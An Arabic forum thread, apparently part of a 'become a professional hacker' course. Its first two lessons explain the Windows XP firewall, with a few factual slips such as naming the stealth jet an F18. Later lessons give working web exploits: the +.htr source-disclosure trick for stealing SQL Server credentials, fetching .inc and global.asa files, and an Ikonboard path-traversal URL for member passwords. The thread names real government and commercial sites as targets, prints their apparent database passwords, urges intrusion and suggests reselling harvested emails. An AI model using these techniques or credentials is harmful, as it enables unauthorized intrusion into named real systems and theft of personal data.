كيفية عمل جدار حماية اتصال إنترنت (ICF) :
يراقب جدار الحماية كافة أوجه الاتصالات التي تعبر مساره ويختبر عنوان الوجهة والمصدر لكل رسالة يعالجها. لمنع حركة المرور غير المطلوبة من الطرف العام للاتصال من دخول الطرف الخاص، يحتفظ ICF بجدول لكافة الاتصالات التي تم إجراؤها من كمبيوتر ICF. في حالة الكمبيوتر المفرد، يتتبع ICF حركة المرور الخاصة بالكمبيوتر. عند استخدامه مع ICS، يتتبع ICF كامل حركة المرور الخاصة بكمبيوتر ICF/ICS والخاصة بأجهزة كمبيوتر شبكة الاتصال الخاصة. تتم مقارنة حركة المرور الواردة من إنترنت مع الإدخالات في الجدول. ويتم السماح لحركة مرور إنترنت الواردة بالوصول إلى أجهزة الكمبيوتر الموجودة على شبكة الاتصال عند وجود إدخال مطابق في الجدول الذي يظهر بدء تبادل الاتصال من ضمن الكمبيوتر أو شبكة الاتصال الخاصة.
يتم إسقاط الاتصالات الناتجة من مصدر خارج كمبيوتر ICF، كإنترنت مثلاً، من قبل جدار الحماية إلا إذا تم إنشاء إدخال في التبويب الخدمات للسماح بالمرور. وعوضاً عن إرسال إعلامات حول النشاط، يقوم ICF بصمت بتجاهل الاتصالات غير المطلوبة، مع إيقاف المحاولات الشائعة للقرصنة مثل مسح المنفذ. إذ أنه يمكن إرسال هذا النوع من الإعلامات بشكل متكرر مما يؤدي إلى تعطيلك عن العمل. عوضاً عن ذلك، يمكن أن يقوم ICF بإنشاء سجل أمان لعرض النشاط المتتبع من قبل جدار الحماية.
يمكن تكوين الخدمات للسماح بإعادة توجيه حركة المرور غير المطلوبة من إنترنت من قبل كمبيوتر ICF إلى شبكة الاتصال الخاصة. على سبيل المثال، إذا كنت تستضيف خدمة ملقم ويب HTTP، وقمت بتمكين الخدمة HTTP على كمبيوتر ICF، فسيتم إعادة توجيه حركة مرور HTTP غير المطلوبة من قبل كمبيوتر ICF إلى ملقم ويب HTTP. تكون مجموعة معلومات العمل والمعروفة بتعريف الخدمة مطلوبة من قبل ICF للسماح بإعادة توجيه حركة مرور إنترنت غير المطلوبة إلى ملقم ويب على شبكة الاتصال الخاصة. لمزيد من المعلومات حول الخدمات، راجع إضافة تعريف الخدمة، و نظرة عامة حول تعريفات الخدمات.
ماذا نستنتج من السطور اعلاه ؟ :
الغازاً ؟ !! ... لا .. ليس بألغاز بقدر ماهي ميكانيكية برمجية على كل متصل بالانترنت التعرف عل اسسها ومبادئها ، ببساطة توفر الجدران النارية المتداوله كالزون الارم والكلين والبلاك ايس ديفندر واللوك داون وغيرها حماية مفردة اي تكون في مجملها جدارا ناريا خاصا بالمستخدم العادي الذي يستخدم كمبيوتر شخصي وحيد ، ولكنها لاتحمي الشبكات سواء المنزلية او الخاصة بالأعمال ، بصيغة اخرى لو أن زيد من الناس ركب شبكة منزلية في بيته مكونه من خمسة اجهزة فسيتعين عليه إستخدام نظاما خاصا لحماية الشبكة ثم تحميل جدار ناريا مفردا لحماية كل جهاز على حده وفوق ذلك عليه اعادة تهيئة كل جدارناري على حدة حتى يتم نجاح اتصال الأجهزة ببعضها عبر الشبكة الداخليه ، لأن الجدران النارية توقف تواصل الأجهزة مالم يتم تهيئتها لذلك.
تختلف طريقة الجدار الناري الخاص بالويندوز XP في طريقة تعامله مع الشبكات ، حيث يقدم حماية مزدوجة القوة للأجهزة الشخصية المرتبطة بالشبكة وللشبكة ذاتها كما هو مشروح اعلاه ، دون التعرض لإتصال الأجهزة الفردية بعضها ببعض عبر الشبكة الداخلية من جانب ، وإتصال الشبكة الداخلية بالأنترنت من جانب أخر.
التخفي Stealth :
لمعرفة مصطلح التخفي في الإنترنت علينا أن نتعرف على ميكانيكية المطاردة والصيد Chasing & Hunting ، حيث يقوم المخترق بأرسال رسالة إستعلامية مرجعية PING عبر تطبيقات الإختراق ليتسنى له تحديد ارقام الأيبي IPs بالأجهزة ذات المنافذ المفتوحة open ports وهذة دلالة واضحة على ان اصحابها لايحملون بها جدراناً نارية او انهم محملين لجدران نارية إلا ان ملفات تجسسة من نوع احصنة طروادة Trojans قد تم زراعتها بأجهزتهم بطريقة او أخرى وقد تمكنت من فتح بعض المنافذ للغزاة . في هذة العجالة نستتج امرين ، الأول ان الجدران النارية تقوم بوضع كتل صلدة في وجة رسائل الـ PING ، كذلك تغلق المنافذ التي تبحث عن ثغراتها تلكم الرسائل المرجعية خلال عملية المطاردة والصيد Chasing & Hunting.
مايميز جدار الحماية بويندوز XP هو عامل التخفي Stealth وهذة الكلمة الإنجليزية اشتهرت بأسم الطائرة الشبح من نوع F18 التي انتجتها امريكا والتي لايستطيع الرادار ان يتصيدها . من هنا تقترن كلمة Stealth بالجدرا الناري المزود بالويندوز XP بروفيشينال وقد وضعته مايكروسوفت في نسخة الأعمال من الويندوز إكس بي ولم تزود به نسخة الهوم إديتشن لأن الأولى مرتبطة بالشبكات ، والشبكات بحاجة الي حماية من كل وسائل وطرق الإختراق المتعارف عليها ، وعليه فإن الجدار الناري هذا يشكل عامل تخفي عجيب حيث لا تكتشف الرسائل المرجعية PINGs اجهزة الكمبيوتر التي تستخدمة وكأنها - اي الكمبيوترات - غير متصلة اساسا بالأنترنت.
الإختبار التجريبي الفعلي :
إن عملية الحماية المزدوجة التي يقدمها الجدار الناري في الويندوز XP بروفيشينال بما فيها من عامل التخفي Stealth يمكن التحقق من ادائها ونجاحها عبر الإختبار الذي يوفره مركز جيبسون للأبحاث Gibson's Research Center عبر الرابط التالي :
http://grc.com/files/leaktest.exe
انزل برنامج LeakTest واجرى الفحص خلال تنشيط الجدار الناري .
ستحصل على نتيجة كالتالي :
Unable To Connect
LeakTest was unable to connect to the GRC.COM Web Server.
لماذا ؟؟
لأن الجدار الناري الخاص بالويندوز XP جعل جهازك مخفياً كالشبح Stealth كأنما هو غير مرتبط بالأنترنت ، ولذا لم يتمكن سيرفر مركز ابحاث جيبسون من تحديده لتنفيذ الأختبار.
يمكنك شخصيا إجراء إختبار فعلي مماثل للتحقق من فعالية تخفي النظام ، بعد تنشيط الجدار الناري - سنتطرق لهذة العملية بالتفصيل في الحلقة الدراسية القادمة إن شاء الله - حمل جدارا ناريا أخرا بجانب جدار ويندوز XP الناري وراقب ايقونيته ... ستجد انها لاتغمز البته ، وإن حدث وهو نادرا فالسبب اما يعود الي سيرفر مزود الخدمة او الي نشاط الداتا المرسلة من جهازك outbound connections وليست المرسله اليه ، هناك فرق . حسنا ، اوقف خاصية الجدار الناري بالويندوز XP وراقب كم مرة تغمر ايقونية الجدار الناري الخارجي؟؟ ... كثيرا .. اليس كذلك ؟! ... الأن فقط ... أنت الحكم.
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس السابع والثلاثين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:19 am


الدرس السابع والثلاثين

تنشيط خيارات سجل الأمان :
تعودنا جميعا عند تحميل الجدران النارية التقليدية مراقبة ايقونية الجدار الناري لملاحظة محاولات الأختراق المضنية ومن ثم متابعة المخترق لتحديد موقعة عبر رقم الأي بي ومعرفة التطبيق الذي يستخدمه للأختراق . ولأننا تعودنا على ذلك فأننا لن نشعر بالأطمئنان في بداية إستخدامنا لجدار مايكروسوفت ويندوز XP الناري ، فلا وجود لإيقونيات تغمز لأرشادنا لتتبع محاولات الإختراق ، ولا وجود لسجل امان معين نضغط على ايقونية التطبيق لنفتحة ونشاهد تلك المحاولات. لماذا ؟ ، بكل بساطة لأن الجدار الناري هذا يختلف في طريقة عمله عن بقية الجدران النارية التقليدية ، فليس من مهامة الرئيسية تحديد محاولات الإختراق وكشف التطبيقات التي يستخدمها المخترقون ، بل هو أسمى من ان يتحسس ميكانيكية الإختراق لأن ليس هناك ميكانيكة للأختراق من الأساس حيث انه يخفي جهاز المستخدم Stealth وكأنما هو ليس بمتصل بالانترنت البته ، وعليه فإن محاولات المخترقين تطارد شبحا في هذه الحالة. على كل حال ، يحتفظ الجدار الناري بسجل خاص لمحاولات الإختراق إن وجدت ، ولكنه لايقاطع المستخدم بالتغميز او إصدار لصوت تنبيهي عند صد كل محاولة للأختراق كما تفعل الجدران النارية التقليدية ، وإنما يعمل في الخلفية دون اية مقاطعة للمستخدم ومتى ما رغب المستخدم في التعرف على سجل محاولات الأختراق للشبح ، فعلية في هذة الحالة فقط الإطلاع على السجل الأمني يدويا وستفاجأه الحقيقة لأنه سيجد السجل فارغا حيث ليس هناك من الأساس صد لمحاولات إختراق لكمبيوتر شبحي.
يسمح سجل أمان جدار حماية اتصال إنترنت (ICF) للمستخدمين المتقدمين باختيار المعلومات الواجب تسجيلها. باستخدام تسجيل أمان ICF يمكنك:
تسجيل الحزم المسلّمة. سيسجّل هذا كافة الحزم المسقطة التي تنشأ من شبكة الاتصال المنزلية أو المكتبية الصغيرة أو من إنترنت. تسجيل الاتصالات الناجحة. سيسجّل هذا كافة الاتصالات الناجحة التي تنشأ من شبكة الاتصال المنزلية أو المكتبية الصغيرة أو من إنترنت.
عند تحديد خانة الاختيار تسجيل الحزم المسلّمة، يتم جمع معلومات حول كل محاولة حركة المرور للانتقال عبر جدار الحماية يتم الكشف عنها ورفضها من قبل ICF. على سبيل المثال، عند عدم تعيين إعدادات بروتوكول رسائل تحكم إنترنت (ICMP) للسماح بطلبات الارتداد الواردة، مثل تلك المرسلة من قبل أوامر Ping، و Tracert، وتم تلقي طلب الارتداد من خارج شبكة الاتصال، يتم إسقاط طلب الارتداد، ويتم إنشاء إدخال في السجل. عند تحديد خانة الاختيار تسجيل الاتصالات الناجحة، يتم جمع معلومات حول كل اتصال ناجح للتنقل عبر جدار الحماية. على سبيل المثال، عند اتصال شخص ما بنجاح بموقع ويب باستخدام Internet Explorer، يتم إنشاء إدخال في السجل. يتم إنشاء سجل الأمان باستخدام تنسيق W3C Extended Log File Format، يتم استخدام تنسيق مشابه للتنسيق المستخدم في أدوات تحليل السجل الشائعة. للحصول على معلومات حول كيفية عرض سجل أمان ICF، راجع عرض سجل الأمان. لحفظ سجل جدار الحماية باستخدام اسم وموقع من اختيارك، راجع تغيير اسم الملف والمسار لسجل الأمان.
لدى سجل أمان جدار حماية اتصال إنترنت مقطعين:
توفر معلومات العنوان معلومات حول إصدار سجل الأمان والحقول المتوفرة لإدخال البيانات. تعرض معلومات العنوان كقائمة ثابتة. إن نص سجل الأمان هو البيانات المترجمة والتي تم إدخالها كنتيجة لمحاولة حركة المرور عبور جدار الحماية. يتم إدخال الحقول في سجل الأمان من اليسار إلى اليمين عبر الصفحة. إن نص سجل الأمان هو قائمة حيوية، حيث يتم إدخال البيانات عند أسفل السجل. يجب تحديد أحد خياري التسجيل أو كليهما ليتم إدخال البيانات ضمن سجل الأمان.
لتمكين خيارات تسجيل الأمان:
- ا فتح اتصالات شبكة الاتصال. - انقر فوق اتصال شبكة الاتصال الذي تم تمكين جدار حماية اتصال إنترنت (ICF) عليه، ثم تحت مهام شبكة - الاتصال، انقر فوق تغيير إعدادات هذا الاتصال. - في التبويب خيارات متقدمة, انقر فوق إعدادات. - في التبويب تسجيل الأمان، تحت خيارات التسجيل، حدد واحد من الخيارات التالية أو كليهما: - لتمكين تسجيل محاولات الاتصال الوارد غير الناجحة، حدد خانة الاختيار تسجيل الحزم المسلّمة. - لتمكين تسجيل الاتصالات الصادرة الناجحة، حدد خانة الاختيار تسجيل الاتصالات الناجحة.
تكوين الشبكة المنزلية او المكتبية وتزويدها بالجدار الناري الداعم:
لم تكن شبكة الاتصال المنزلية أسهل مما هي عليه الآن في Windows XP Professional. يمكن استخدام معالج إعداد شبكة الاتصال لإعداد الشبكة الخاصة بك بسرعة. يمكن مشاركة الاتصال بالإنترنت مع كافة أجهزة الكمبيوتر على الشبكة الخاصة بك وكن مرتاحاً لحماية الكمبيوتر الخاص بك من قبل جدار حماية اتصال إنترنت.
إعداد شبكة الاتصال المنزلية أو المكتبية الصغيرة :
يرشدك معالج إعداد شبكة الاتصال خلال تكوين شبكة الاتصال المنزلية أو المكتبية الصغيرة. يمكن إعداد كافة أجهزة الكمبيوتر على الشبكة الخاصة بك لتستخدم اتصالاً وحيداً بالإنترنت، وتسمية كل كمبيوتر أو تزويده بوصف، وتمكين جدار حماية اتصال إنترنت. يمكنك استخدام معالج إعداد شبكة الاتصال فقط بعد إعداد أجهزة الكمبيوتر وتوصيلها فعلياً.
الإنشاء السهل لشبكة الاتصال المنزلية :
هل تريد مزيداً من المعلومات حول جدوى إعداد شبكة اتصال، وكيفية ذلك؟ في حال وجود جهازي كمبيوتر أو أكثر في المنزل أو في المكتب الصغير، فإن وصلها كشبكة اتصال يزيد من إمكانياتها وربما يوفر عليك المال. عند إعداد شبكة اتصال، يمكن مشاركة الأجهزة (مثل الطابعات والماسحات الضوئية)، ومشاركة اتصال وحيد بالإنترنت، ومشاركة الملفات والمجلدات. يمكن أيضاً تشغيل التسالي التي تعمل على أجهزة كمبيوتر متعددة. يرشدك Windows XP Professional خطوة بخطوة خلال عملية إعداد شبكة الاتصال المنزلية أو المكتبية الصغيرة. شبكة الاتصال هي أكثر من مجرد مجموع مكوناتها. يمكن لأجهزة الكمبيوتر على شبكة اتصال مشاركة اتصال إنترنت، والطابعات وأجهزة أخرى، وعرض الملفات بشكل مشترك. ويمكنك استخدام شبكة الاتصال كذلك للعب ألعاب الكمبيوتر متعددة اللاعبين. إن ربط أجهزة الكمبيوتر لتشكيل شبكة اتصال يزيد كثيراً من إمكانياتها ويمكن أن يوفّر نقودك! هل يحتوي بيتك على جهازي كمبيوتر أو أكثر? عن طريق وصلها بشبكة اتصال، يمكنك:
- أن تتشارك باتصال إنترنت وحيد. يملك Microsoft® Windows® XP ميزة تدعى مشاركة اتصال إنترنت (ICS). وباستخدام ICS, يشارك كمبيوتر واحد, يدعى مضيف ICS, اتصال إنترنت الخاص به مع باقي أجهزة الكمبيوتر على شبكة الاتصال. وعن طريق مشاركة اتصال إنترنت وحيد، يمكنك بشكل متزامن التنقل في ويب على جهازك بينما يقوم فرد آخر من العائلة بمراجعة البريد الإلكتروني على كمبيوتر آخر.
- أن تتشارك بالطابعة، والماسح، والأجهزة الأخرى. قد يكون لديك طابعة متصلة بكمبيوتر في غرفة أخرى. باستخدام شبكة الاتصال المنزلية، يمكنك الطباعة على هذه الطابعة من الكمبيوتر الذي في غرفتك. لم تعد بحاجة إلى نسخ الملف على قرص مرن وأخذه إلى الكمبيوتر الذي يملك الطابعة.
- أن تتشارك بالملفات والمجلدات. افرض أن ابنك طلب إليك النظر إلى تقرير مدرسي موجود على الكمبيوتر في غرفة نومه. عندما تكون أجهزة الكمبيوتر مرتبطة بشبكة اتصال يمكنك, على سبيل المثال, فتح الملف من جهازك، وإجراء التغييرات، ثم حفظ الملف على كمبيوتر ابنك.
- أن تلعب ألعاب الكمبيوتر متعددة اللاعبين. عن طريق شبكات الاتصال ومشاركة اتصال إنترنت، يمكن لأفراد العائلة أن يلعبو ألعاباً على أجهزة كمبيوتر منفصلة مع بعضهم أو على إنترنت. وبينما هم يلعبون، يمكنك أيضاً التنقل في ويب — على سبيل المثال، زيارة مواقع الرياضة والمال المفضلة لديك.
وهناك المزيد: يجعل Microsoft Windows XP استخدام شبكات الاتصال أسهل من أي وقت مضى. ولكن عليك أولاً ربط أجهزة الكمبيوتر ببعضها، عن طريق تثبيت الأجهزة المناسبة في كل منها وعن طريق وصلها بالأسلاك أو بوسائط التقنية اللاسلكية. تشرح هذه المقالة العملية من البداية إلى النهاية. ستتعلم كيف تختار تقنية شبكة الاتصال المناسبة لبيتك، والمكوّنات المناسبة التي يجب الحصول عليها، وكيفية تثبيتها ووصلها بالشكل المناسب. وهناك أيضاً قسم حول حماية شبكة الاتصال المنزلية من المتطفلين الخارجيين عن طريق إنشاء حاجز آمن يدعى جدار الحماية، وهو نفسه الذي يُستخدم في مجال الأعمال.
مشاركة اتصال إنترنت :
استخدم مشاركة اتصال إنترنت لوصل أجهزة كمبيوتر شبكة الاتصال المنزلية بإنترنت بواسطة اتصال وحيد فقط. بواسطة مشاركة اتصال إنترنت، يمكن استخدام برامج استعراض إنترنت وخدمات البريد الإلكتروني من أي كمبيوتر على شبكة الاتصال الخاصة بك، حتى وإن لم يكن ذلك الكمبيوتر موصولاً بالإنترنتز يمكنك بواسطة مشاركة الاتصال بإنترنت (ICS) الاتصال بأجهزة الكمبيوتر الموجودة على الشبكة المنزلية أو المكتبية الصغيرة بإنترنت باستخدام اتصال واحد فقط. على سبيل المثال، لديك كمبيوتر واحد متصل بإنترنت باستخدام اتصال الطلب الهاتفي. وعند تمكين ICS على هذا الكمبيوتر، حيث يدعى مضيف ICS، ستتصل أجهزة الكمبيوتر على شبكة الاتصال بإنترنت باستخدام اتصال الطلب الهاتفي هذا. عند إعداد الشبكة المنزلية أو المكتبية الصغيرة، فمن المستحسن استخدام معالج إعداد شبكة الاتصال في Windows XP Professional لتمكين مشاركة الاتصال بإنترنت. يوفر معالج إعداد شبكة الاتصال تلقائياً كافة إعدادات شبكة الاتصال التي تحتاجها لمشاركة اتصال واحد بإنترنت مع كافة أجهزة الكمبيوتر الموجودة على شبكة الاتصال. بعد تمكين ICS، وبعد التأكد من أن كافة أجهزة الكمبيوتر لديك يمكنها الاتصال مع بعضها ومن أنه يمكنها الوصول إلى إنترنت، يمكنك استخدام برامج مثل Internet Explorer و Outlook Express كما لو أنه تم وصلها مباشرةً مع موفر خدمة إنترنت (ISP). عند إجراء طلب لإنترنت، يتصل كمبيوتر المضيف ICS بـ ISP ويقوم بإنشاء اتصال بحيث تتمكن أجهزة الكمبيوتر الأخرى من الوصول إلى عنوان معين على ويب أو من تحميل بريد إلكتروني. لاختبار اتصال إنترنت والشبكة لديك، تأكد من أنه يمكنك مشاركة الملفات بين أجهزة الكمبيوتر ومن إمكانية كل كمبيوتر من الوصول إلى عنوان ويب. إن مشاركة الاتصال بإنترنت مخصصة للاستخدام في شبكة الاتصال حيث يوجه الكمبيوتر المضيف ICS اتصالات الشبكة بين أجهزة الكمبيوتر وإنترنت. من المفترض أنه في الشبكة المنزلية أو المكتبية الصغيرة، أن يكون لدى الكمبيوتر المضيف ICS اتصال إنترنت الوحيد. بينما قد يكون لدى أجهزة الكمبيوتر الأخرى أجهزة مودم للوصول إلى إنترنت، ويكون الاتصال الأساسي الخاص بهم عبر الكمبيوتر المضيف ICS. عليك تمكين ICS على الاتصال العمومي للشبكة المنزلية أو المكتبية الصغيرة. إذا كان لديك أكثر من محول شبكة اتصال واحد مثبت على الكمبيوتر، فعليك اختيار اتصال الشبكة المحلية الذي يتصل بباقي أجهزة الكمبيوتر على الشبكة المنزلية أو المكتبية الصغيرة. ويدعى هذا أيضاً باتصال شبكة الاتصال الخاصة. إذا تواجد اتصالي شبكة محلية أو أكثر، فعند تمكين ICS، عليك القيام بواحد مما يلي:
حدد اتصال واحد للاتصال بباقي أجهزة الكمبيوتر الموجودة على شبكة الاتصال. لمزيد من المعلومات حول كيفية اختيار الاتصال الخاص، راجع اتصالات شبكة الاتصال الخاصة والعامة. إذا كان لديك اتصالين محليين أو أكثر، وكان جميعها يتصل بباقي أجهزة الكمبيوتر الموجودة على شبكة الاتصال لديك، فعليك استخدام جسر لوصل الاتصالات المحلية قبل تحديد الاتصال بالشبكة المنزلية أو المكتبية الصغيرة. إذا اخترت إنشاء جسر شبكة اتصال يتضمن كافة الاتصالات المحلية بشبكة الاتصال لديك، فيتم تحديد الجسر تلقائياً عند تمكين ICS. وإذا قمت بإنشاء جسر شبكة اتصال لا يتضمن كافة الاتصالات المحلية بشبكة الاتصال لديك، يبقى بإمكانك تحديد الجسر كاتصال خاص.
جدار حماية اتصال إنترنت
يعمل جدار حماية اتصال إنترنت كنظام أمان، يحدد المعلومات المتبادلة من أجهزة الكمبيوتر على شبكة الاتصال الخاصة بك إلى إنترنت، ومن إنترنت إلى أجهزة الكمبيوتر على شبكة الاتصال لديك، يمكن أيضاً تمكين جدار حماية اتصال إنترنت على كافة أجهزة الكمبيوتر على شبكة الاتصال الخاصة بك، حتى وإن كانت أجهزة الكمبيوتر تشترك باتصال وحيد بالإنترنت.
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الثامن والثلاثين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:20 am


الدرس الثامن والثلاثين
اخواني الكرام ....
في هذا الدرس سوف نتحدث عن بعض الطرق او المهارات في إختراق الاس كيو ال انا اعتقد ان هذا الملف ليس بالمستوى المطلوب
لكنها محاولات بسيطة ارجوا ان تفيد الجميع .

س :في البداية ماهي الاس كيو ال ( SQL )؟؟

الاس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب ASP هي صفحات تسحب بياناتها
من قاعدة SQL وصفحات ASP ممكن ان تكون كنز من المعلومات لاختراق قواعد بيانات SQL وهذا ماسوف اشير اليه لاحقا ، و SQL
تتنصت على البورت 1433
ايضا مااريد ان اخبرك به ان ال SQL قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على عدد من الجداول يمكن
ان تتصور كبرقواعد بيانات SQL والعدد الكبير من البيانات التى تحتويها .

س : مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات SQL ؟
هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى لا اقصد منتديات PHP بل منتديات ASP في الغالب سوف تحصل على جميع اسماء
المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلاحيات لم تكن تحلم بها ، اما اذا كان الموقع يحتوي على ميزة
قائمة المراسلات فسوف تحصل على اعداد خيالية من الايميلات ، عندها قم بانشاء شركة للدعاية والاعلان وسوف تصبح ثريا اذن لاتنسى LinuxRay_
توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص - ارقام هواتف - عناوين - تورايخ الميلاد ، ممكن ان تصبح Administrator .


اعرف انه قد اصابك الملل الان لكن استعد نشاطك من جديد فالطريق مازال طويلا ...


س : مالذي تحتاجة للدخول على قواعد بيانات SQL ؟

تحتاج فقط لل User Name و Passwd

س : من اين احصل على اسم المستخدم وكلمة المرور ؟

هناك طرق عديدة للحصول على User name and Passwd منها كما اسلف صفحات ال ASP وملفات اخرى من نوع *.sql هناك ثغرات كثير يمكن
ان تحصل منها على كلمات المرور مثل ثغرة +.htr
كيف تستخدم هذه الثغرة :


http://target/page.asp+.htr
target : الموقع الهدف
Page : صفحة asp
+.htr : الثغرة


هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لاتحتوي على اي حرف .... اعرف انك سوف تتساءل مالفائدة اذن منها الفائدة هو
خلف هذه الصفحة البيضاء اذهب الى View Source لكي ترى اوامر البرمجة الخاصة ب ASP التى لايمكن لك ان تراها في الوضع العادي : مثل


<%

Set DB= Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"


%>
------------------------------------------------------------------
في الكود السابق ترى ان اسم المستخدم هو _LinuxRay
وكلمة السر هي 6666666
------------------------------------------------------------------



الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ASP مثل الاتي :

AMicrosoft VBScript runtime error '800a01a8'

Object required: 'Conn'

/filename.inc, line 5

هناك ملف ينتهي بامتداد *.inc هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم المستخدم وكلمة المرور
اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع .


وممكن ان ترى مثل هذا الامر في صفحة ASP
عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف database.inc

<!--#include file = "database.inc"-->


وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات

global.asa
++global.asa
beforemilion-global.asa
-global.asa
milion.sql
global-direct.asa

ليس من الضرورة ان تكون الملفات بهذه الاسماء لكن هذا هو المعتاد عليه من قبل مبرمجين SQL

وكل ماعليك فعله ان تكتب اسم الصفحة مثل الاتي :

global.asa+.htr

هناك ثغرة قديمة في IIS 3 وهي ان تضيف بعد صفحة ASP هذا الرمز ::$data كما يلي
file.asp::$data
هذه الثغرة لاتعمل الا على IIS 3 فلا تتعب نفسك بتطبيقها فقط للعلم لا اكثر .


لقد اقتربنا من النهاية ... ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟

بعدها الدخول على قاعدة ال SQL !!

هناك عدة برامج تدخل على قاعدة البينات انا استخدم Visual interdev 6.0 لكني مازلت افضل استخدام البرنامج السهل ACCESS 2000


كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة
File
اختر
New
ومن قائمة الملفات الجديدة اختار
Project (Exiting Data)
اي مشروع قاعدة بيانات موجودة .
سيظهر لك مربع لانشاء الملف اختر
Create
اي انشاء

الان سترى مربع
Data Link Properties

تحتاج فقط لثلاث معلومات اسم الموقع او الاي بي - اسم المستخدم - كلمة المرور

1 - ادخل اسم الموقع في صندوق Select or enter server name

2 - اسم المستخدم في User Name

3 - كلمة السر Password


ملاحظة ( قم بإزالة الصح من مربع Blank Password)

اضغط في البداية على Test Connection في الاسفل لاختبار الاتصال بقاعدة البيانات اذا رأيت هذه العبارة Test Connection Succeeded
فمعناه ان الاتصال بقاعدة البيانات تم بنجاح.
يمكنك الان ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة :
Select the data base on the server
واضغط على OK او موافق .

فئران التجارب :
موقع http://www.moe.gov.sa

1- قم بالدخول على الصفحة التالية :

http://www.moe.gov.sa/news_admin.asp

سترى مايلي

Microsoft VBScript runtime error '800a01a8'

Object required: 'Conn'

/news_admin.asp, line 7


ثم طبق عليها ثغرة htr كتالي :

http://www.moe.gov.sa/news_admin.asp+.htr

اذهب الى السورس لترى

<!--#include file = "database.inc"-->

قم بسحب ملف database.inc كتالي :

http://www.moe.gov.sa/database.inc

سوف ترى مايلي :

<%

Set DB= Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321"


%>

هل تعرف مالذي امام عينك الان انه اسم المستخدم وكلمة المرور ..... سارع بالتشبيك على قاعدة البيانات انا اعرف ان لا احد يحب مادة
الكيمياء .

فأر التجارب الثاني :

موقع http://www.itsalat.com

1 - User name : sa Passwd : sp2000

هذا فأر على الطاير شبك على قاعدة البيانات واحصل على ما تريد
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس التاسع والثلاثين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:21 am

الدرس التاسع والثلاثين
الأختراق العشوائي
Random Hacking




- ماهو الـإختراق العشوائي Random Hacking
- تطويره بحيث يصبح يبحث على إستثمارات غير الـ CGIScripts
- كيف تستغل اي ثغره بعد الحصول عليها

- ماهو الـإختراق العشوائي Random Hacking
هو البحث في كميه كبيره من المواقع عن ثغره محدده ، وهذا سهل ويعود بمواقع كثيره جدا جاهزه للإختراق ، مثال بسيط جدا ، روح على محرك بحث ، من محركات البحث التي تعتمد على الـ spiders أو العناكب مثل altavista.com وأكتب link:xxxx.cgi or pl ، (إرجع لشرح زورو في رياضيات البحث) مثلا نبحث عن لنك لملف بإسم help.cgi ، link:help.cgi المواقع المردوده لك نتيجه للبحث كلها تملك منتدى Ikonboard ، إفتح واحد منها وأبحث في المصدر الكود HTML عن السكربت الذي بحثت عنه help.cgi لتعرف اين مكانه ، لنفرض مكانه هنا http://www.example.com/cgi-bin/help.cgi
أكتب بعد الملف غير العنوان ليصبح http://www.example.com/cgi-bin/help....on=../members/[member].cgi%00
مع ملاحظه تغيير [member] بإسم عضو وبدون القوسين [] طبعا
سوف يعرض لك معلومات العضو كامله ومن ظمنها كلمة المرور وهذه الثغره لـ المنتدى Ikonboard 2.1.7 وهذا ليس لب موضوعي ولكن هي بدايه ومثال لا تحفظه لأني أحضرت أبسط مثال فقط فيوجد غيره مئات بل آلاف ملفات الـ CGIScript تملك ثغرات مثل هذه واغلب إستثماراتها تكون من خلال url
للحصول على مثل هذه الإستثمارات لثغرات ملفات السي جي آي سكريبت شوف الأرشيف هذا وهو لغته روسيه أعتقد ولكن ما يهم لأننا نبحث عن الـ Exploit أو الإستثمار
http://www.secure.f2s.com/eng_ver/bugs/
